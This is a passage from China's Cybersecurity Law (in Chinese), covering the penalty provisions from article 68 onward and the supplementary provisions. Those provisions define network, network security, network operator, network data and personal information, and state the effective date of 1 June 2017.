电子信息发送服务提供者、应用软件下载服务提供者，不履行本法第四十八条第二款规定的安全管理义务的，依照前款规定处罚。

第六十九条 网络运营者违反本法规定，有下列行为之一的，由有关主管部门责令改正；拒不改正或者情节严重的，处五万元以上五十万元以下罚款，对直接负责的主管人员和其他直接责任人员，处一万元以上十万元以下罚款：

（一）不按照有关部门的要求对法律、行政法规禁止发布或者传输的信息，采取停止传输、消除等处置措施的；

（二）拒绝、阻碍有关部门依法实施的监督检查的；

（三）拒不向公安机关、国家安全机关提供技术支持和协助的。

第七十条 发布或者传输本法第十二条第二款和其他法律、行政法规禁止发布或者传输的信息的，依照有关法律、行政法规的规定处罚。

第七十一条 有本法规定的违法行为的，依照有关法律、行政法规的规定记入信用档案，并予以公示。

第七十二条 国家机关政务网络的运营者不履行本法规定的网络安全保护义务的，由其上级机关或者有关机关责令改正；对直接负责的主管人员和其他直接责任人员依法给予处分。

第七十三条 网信部门和有关部门违反本法第三十条规定，将在履行网络安全保护职责中获取的信息用于其他用途的，对直接负责的主管人员和其他直接责任人员依法给予处分。

网信部门和有关部门的工作人员玩忽职守、滥用职权、徇私舞弊，尚不构成犯罪的，依法给予处分。

第七十四条 违反本法规定，给他人造成损害的，依法承担民事责任。

违反本法规定，构成违反治安管理行为的，依法给予治安管理处罚；构成犯罪的，依法追究刑事责任。

第七十五条 境外的机构、组织、个人从事攻击、侵入、干扰、破坏等危害中华人民共和国的关键信息基础设施的活动，造成严重后果的，依法追究法律责任；国务院公安部门和有关部门并可以决定对该机构、组织、个人采取冻结财产或者其他必要的制裁措施。

第七章 附 则

第七十六条 本法下列用语的含义：

（一）网络，是指由计算机或者其他信息终端及相关设备组成的按照一定的规则和程序对信息进行收集、存储、传输、交换、处理的系统。

（二）网络安全，是指通过采取必要措施，防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故，使网络处于稳定可靠运行的状态，以及保障网络数据的完整性、保密性、可用性的能力。

（三）网络运营者，是指网络的所有者、管理者和网络服务提供者。

（四）网络数据，是指通过网络收集、存储、传输、处理和产生的各种电子数据。

（五）个人信息，是指以电子或者其他方式记录的能够单独或者与其他信息结合识别自然人个人身份的各种信息，包括但不限于自然人的姓名、出生日期、身份证件号码、个人生物识别信息、住址、电话号码等。

第七十七条 存储、处理涉及国家秘密信息的网络的运行安全保护，除应当遵守本法外，还应当遵守保密法律、行政法规的规定。

第七十八条 军事网络的安全保护，由中央军事委员会另行规定。

第七十九条 本法自2017年6月1日起施行。